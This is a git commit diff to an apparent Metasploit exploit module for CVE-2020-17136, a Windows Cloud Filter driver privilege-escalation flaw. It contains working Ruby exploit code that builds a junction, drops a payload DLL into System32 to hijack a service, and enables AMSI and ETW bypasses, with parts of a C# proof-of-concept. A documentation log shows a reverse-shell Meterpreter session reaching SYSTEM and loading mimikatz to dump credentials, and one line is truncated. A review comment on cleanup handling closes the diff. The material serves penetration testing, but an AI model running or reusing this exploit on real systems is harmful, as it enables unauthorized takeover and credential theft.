Make second round of review edits to fix Spencer's comments
This commit is contained in:
parent
d5bb36c530
commit
3072391d00
Binary file not shown.
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
|
|||||||
they don't have permissions to create files in.
|
they don't have permissions to create files in.
|
||||||
|
|
||||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
||||||
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
|
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
|
||||||
then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
|
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
|
||||||
thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
|
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
|
||||||
|
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
|
||||||
|
the `SYSTEM` user.
|
||||||
|
|
||||||
### Installation And Setup
|
### Installation And Setup
|
||||||
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
|
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. Get a meterpreter shell as a low privileged user.
|
2. Get a shell as a low privileged user.
|
||||||
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
|
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
|
||||||
4. `use exploit/windows/local/cve_2020_17136`
|
4. `use exploit/windows/local/cve_2020_17136`
|
||||||
5. `set session *session id*`
|
5. `set session *session id*`
|
||||||
6. `run`
|
6. `run`
|
||||||
7. **Verify** that you get a new shell as the `SYSTEM` user
|
7. **Verify** that you get a new shell as the `N` user
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run
|
|||||||
|
|
||||||
[*] Started bind TCP handler against 172.22.152.177:4444
|
[*] Started bind TCP handler against 172.22.152.177:4444
|
||||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||||
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
|
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
|
||||||
|
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: DESKTOP-KUO5CML\normal
|
Server username: DESKTOP-KUO5CML\normal
|
||||||
@ -60,14 +62,6 @@ SeShutdownPrivilege
|
|||||||
SeTimeZonePrivilege
|
SeTimeZonePrivilege
|
||||||
SeUndockPrivilege
|
SeUndockPrivilege
|
||||||
|
|
||||||
meterpreter > sysinfo
|
|
||||||
Computer : DESKTOP-KUO5CML
|
|
||||||
OS : Windows 10 (10.0 Build 19041).
|
|
||||||
Architecture : x64
|
|
||||||
System Language : en_US
|
|
||||||
Domain : WORKGROUP
|
|
||||||
Logged On Users : 5
|
|
||||||
Meterpreter : x64/windows
|
|
||||||
meterpreter > getsystem
|
meterpreter > getsystem
|
||||||
[-] 2001: Operation failed: Access is denied. The following was attempted:
|
[-] 2001: Operation failed: Access is denied. The following was attempted:
|
||||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||||
@ -78,16 +72,20 @@ meterpreter > background
|
|||||||
[*] Backgrounding session 1...
|
[*] Backgrounding session 1...
|
||||||
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
|
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
|
||||||
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
||||||
|
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
||||||
|
SESSION => 1
|
||||||
|
msf6 exploit(windows/local/cve_2020_17136) > check
|
||||||
|
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > show options
|
msf6 exploit(windows/local/cve_2020_17136) > show options
|
||||||
|
|
||||||
Module options (exploit/windows/local/cve_2020_17136):
|
Module options (exploit/windows/local/cve_2020_17136):
|
||||||
|
|
||||||
Name Current Setting Required Description
|
Name Current Setting Required Description
|
||||||
---- --------------- -------- -----------
|
---- --------------- -------- -----------
|
||||||
AMSIBYPASS true yes Enable Amsi bypass
|
AMSIBYPASS true yes Enable Amsi bypass
|
||||||
ETWBYPASS true yes Enable Etw bypass
|
ETWBYPASS true yes Enable Etw bypass
|
||||||
SESSION yes The session to run this module on.
|
SESSION 1 yes The session to run this module on.
|
||||||
WAIT 5 no Time in seconds to wait
|
WAIT 5 no Time in seconds to wait
|
||||||
|
|
||||||
|
|
||||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||||
@ -106,36 +104,52 @@ Exploit target:
|
|||||||
0 Windows DLL Dropper
|
0 Windows DLL Dropper
|
||||||
|
|
||||||
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
|
||||||
SESSION => 1
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
|
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
|
||||||
LHOST => 172.22.159.28
|
LHOST => 172.22.159.28
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
|
|
||||||
LPORT => 6688
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > run
|
msf6 exploit(windows/local/cve_2020_17136) > run
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 172.22.159.28:6688
|
[*] Started reverse TCP handler on 172.22.159.28:4444
|
||||||
[*] Executing automatic check (disable AutoCheck to override)
|
[*] Executing automatic check (disable AutoCheck to override)
|
||||||
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||||
[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
|
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
|
||||||
[*] Running module against DESKTOP-KUO5CML
|
[*] Running module against DESKTOP-KUO5CML
|
||||||
[*] Launching notepad.exe to host CLR...
|
[*] Launching notepad.exe to host CLR...
|
||||||
[+] Process 7784 launched.
|
[+] Process 100 launched.
|
||||||
[*] Reflectively injecting the Host DLL into 7784..
|
[*] Reflectively injecting the Host DLL into 100..
|
||||||
[*] Injecting Host into 7784...
|
[*] Injecting Host into 100...
|
||||||
[*] Host injected. Copy assembly into 7784...
|
[*] Host injected. Copy assembly into 100...
|
||||||
[*] Assembly copied.
|
[*] Assembly copied.
|
||||||
[*] Executing...
|
[*] Executing...
|
||||||
[*] Start reading output
|
[*] Start reading output
|
||||||
[+] Key: 1821285265184
|
[+] Sync connection key: 2733760425760
|
||||||
[+] Done
|
[+] Done
|
||||||
[*] End output.
|
[*] End output.
|
||||||
[+] Execution finished.
|
[+] Execution finished.
|
||||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||||
[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
|
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
|
||||||
[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
|
|
||||||
[+] Obtained SYSTEM via technique 4
|
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: NT AUTHORITY\NETWORK SERVICE
|
||||||
|
meterpreter > getprivs
|
||||||
|
|
||||||
|
Enabled Process Privileges
|
||||||
|
==========================
|
||||||
|
|
||||||
|
Name
|
||||||
|
----
|
||||||
|
SeAssignPrimaryTokenPrivilege
|
||||||
|
SeAuditPrivilege
|
||||||
|
SeChangeNotifyPrivilege
|
||||||
|
SeCreateGlobalPrivilege
|
||||||
|
SeImpersonatePrivilege
|
||||||
|
SeIncreaseQuotaPrivilege
|
||||||
|
SeIncreaseWorkingSetPrivilege
|
||||||
|
SeShutdownPrivilege
|
||||||
|
SeTimeZonePrivilege
|
||||||
|
SeUndockPrivilege
|
||||||
|
|
||||||
|
meterpreter > getsystem
|
||||||
|
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: NT AUTHORITY\SYSTEM
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
meterpreter > getprivs
|
meterpreter > getprivs
|
||||||
@ -157,7 +171,7 @@ SeTimeZonePrivilege
|
|||||||
SeUndockPrivilege
|
SeUndockPrivilege
|
||||||
|
|
||||||
meterpreter > load kiwi
|
meterpreter > load kiwi
|
||||||
Loading extension kiwi...cre
|
Loading extension kiwi...
|
||||||
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
||||||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
||||||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
||||||
@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null)
|
|||||||
test DESKTOP-KUO5CML (null)
|
test DESKTOP-KUO5CML (null)
|
||||||
|
|
||||||
|
|
||||||
meterpreter > background
|
meterpreter >
|
||||||
[*] Backgrounding session 2...
|
Background session 2? [y/N]
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > sessions
|
msf6 exploit(windows/local/cve_2020_17136) > sessions
|
||||||
|
|
||||||
Active sessions
|
Active sessions
|
||||||
@ -208,7 +222,7 @@ Active sessions
|
|||||||
Id Name Type Information Connection
|
Id Name Type Information Connection
|
||||||
-- ---- ---- ----------- ----------
|
-- ---- ---- ----------- ----------
|
||||||
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
|
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
|
||||||
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
|
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
|
||||||
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) >
|
msf6 exploit(windows/local/cve_2020_17136) >
|
||||||
```
|
```
|
||||||
|
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
|
|||||||
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
|
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
|
||||||
try
|
try
|
||||||
{
|
{
|
||||||
Console.WriteLine("Key: {0}", key);
|
Console.WriteLine("Sync connection key: {0}", key);
|
||||||
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
|
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
|
||||||
place_holders[0].RelativeFileName = FilePath;
|
place_holders[0].RelativeFileName = FilePath;
|
||||||
CF_FS_METADATA meta_data = new CF_FS_METADATA
|
CF_FS_METADATA meta_data = new CF_FS_METADATA
|
||||||
|
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||||
include Msf::Post::Windows::Dotnet
|
include Msf::Post::Windows::Dotnet
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
|
include Msf::Post::Windows::FileSystem
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
prepend Msf::Exploit::Remote::AutoCheck
|
prepend Msf::Exploit::Remote::AutoCheck
|
||||||
|
|
||||||
@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
info,
|
info,
|
||||||
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
|
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
|
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
|
||||||
did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
|
2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
|
||||||
FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
|
calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
|
||||||
controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
|
function with attacker controlled input. This meant that files were created with
|
||||||
security checks that would otherwise prevent a normal user from being able to create files in directories
|
KernelMode permissions, thereby bypassing any security checks that would otherwise
|
||||||
|
prevent a normal user from being able to create files in directories
|
||||||
they don't have permissions to create files in.
|
they don't have permissions to create files in.
|
||||||
|
|
||||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
This module abuses this vulnerability to perform a DLL hijacking attack against the
|
||||||
Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
|
Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
|
||||||
then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
|
NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
|
||||||
thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
|
of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
|
||||||
|
new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
|
||||||
|
to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [
|
'Author' => [
|
||||||
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
'SessionTypes' => ['meterpreter'],
|
'SessionTypes' => ['meterpreter'],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Arch' => [ARCH_X86, ARCH_X64],
|
'Arch' => [ARCH_X64],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
|
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
|
||||||
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
{
|
{
|
||||||
'EXITFUNC' => 'process',
|
'EXITFUNC' => 'process',
|
||||||
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
|
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
|
||||||
'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
|
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_required_clr(exe_path)
|
|
||||||
filecontent = File.read(exe_path).bytes
|
|
||||||
sign = 'v4.0.30319'.bytes
|
|
||||||
filecontent.each_with_index do |_item, index|
|
|
||||||
sign.each_with_index do |subitem, indexsub|
|
|
||||||
break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)
|
|
||||||
|
|
||||||
if indexsub == 9
|
|
||||||
vprint_status('CLR version required: v4.0.30319')
|
|
||||||
return 'v4.0.30319'
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
vprint_status('CLR version required: v2.0.50727')
|
|
||||||
'v2.0.50727'
|
|
||||||
end
|
|
||||||
|
|
||||||
def check_requirements(clr_req, installed_dotnet_versions)
|
def check_requirements(clr_req, installed_dotnet_versions)
|
||||||
installed_dotnet_versions.each do |fi|
|
installed_dotnet_versions.each do |fi|
|
||||||
if clr_req == 'v4.0.30319'
|
if clr_req == 'v4.0.30319'
|
||||||
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
|
|
||||||
def check
|
def check
|
||||||
sysinfo_value = sysinfo['OS']
|
sysinfo_value = sysinfo['OS']
|
||||||
|
|
||||||
if sysinfo_value !~ /windows/i
|
if sysinfo_value !~ /windows/i
|
||||||
# Non-Windows systems are definitely not affected.
|
# Non-Windows systems are definitely not affected.
|
||||||
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
|
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
|
||||||
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
def exploit
|
def exploit
|
||||||
if sysinfo['Architecture'] != 'x64'
|
if sysinfo['Architecture'] != 'x64'
|
||||||
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
|
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
|
||||||
|
elsif session.arch != 'x64'
|
||||||
|
fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
|
||||||
end
|
end
|
||||||
dir_junct_path = 'C:\\Windows\\Temp'
|
dir_junct_path = 'C:\\Windows\\Temp'
|
||||||
intermediate_dir = rand_text_alpha(10).to_s
|
intermediate_dir = rand_text_alpha(10).to_s
|
||||||
junction_dir = rand_text_alpha(10).to_s
|
junction_dir = rand_text_alpha(10).to_s
|
||||||
|
path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
|
||||||
|
|
||||||
cd(dir_junct_path)
|
mkdir("#{path_to_intermediate_dir}")
|
||||||
mkdir(intermediate_dir)
|
if !directory?("#{path_to_intermediate_dir}")
|
||||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
|
|
||||||
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
||||||
end
|
end
|
||||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
|
register_dir_for_cleanup("#{path_to_intermediate_dir}")
|
||||||
|
|
||||||
cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
|
mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
|
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
|
||||||
|
end
|
||||||
|
|
||||||
|
mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
|
||||||
|
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
|
fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
|
||||||
end
|
end
|
||||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
|
||||||
|
|
||||||
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
|
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
|
||||||
unless File.file?(exe_path)
|
unless File.file?(exe_path)
|
||||||
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
if installed_dotnet_versions == []
|
if installed_dotnet_versions == []
|
||||||
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
|
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
|
||||||
end
|
end
|
||||||
rclr = find_required_clr(exe_path)
|
if check_requirements('v4.0.30319', installed_dotnet_versions) == false
|
||||||
if check_requirements(rclr, installed_dotnet_versions) == false
|
|
||||||
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
|
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
|
||||||
end
|
end
|
||||||
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
||||||
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
||||||
write_file(payload_path, generate_payload_dll)
|
write_file(payload_path, generate_payload_dll)
|
||||||
register_file_for_cleanup(payload_path)
|
register_file_for_cleanup(payload_path)
|
||||||
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||||
service_start('smphost')
|
service_start('smphost')
|
||||||
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
||||||
|
sleep(3)
|
||||||
|
delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
|
||||||
end
|
end
|
||||||
|
|
||||||
def pid_exists(pid)
|
def pid_exists(pid)
|
||||||
|
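Review bot: The mount point created by `create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')` in hunk `@ -153,23 +138,29 @@` is torn down only on the success path by `delete_mount_point` at the end of `exploit` in hunk `@ -180,17 +171,18 @@`, so every `fail_with` between the two (missing `exe_path`, no .NET framework, failed CLR check) and any exception raised by `execute_assembly` or `service_start` leaves a reparse point to the system drive inside `path_to_intermediate_dir`, which is registered with `register_dir_for_cleanup`, while the old `register_dir_for_cleanup` for the junction directory was removed rather than replaced. I cannot confirm from these hunks how the FileDropper cleanup treats reparse points, so the safe change is to make teardown unconditional: wrap the block from `unless File.file?(exe_path)` through `sleep(3)` in `begin … ensure` and move `delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)` into the `ensure` clause (`fail_with` raises, so the clause runs on every exit). The fixed `sleep(3)` before teardown is also a timing assumption about the service having loaded the DLL; the `show options` output in the documentation section lists a `WAIT` option for this module, so `sleep(datastore['WAIT'])` would be the more consistent choice, hedged because the option's registration is outside the visible hunks. `exploit` spans both hunks and its body between them is not shown.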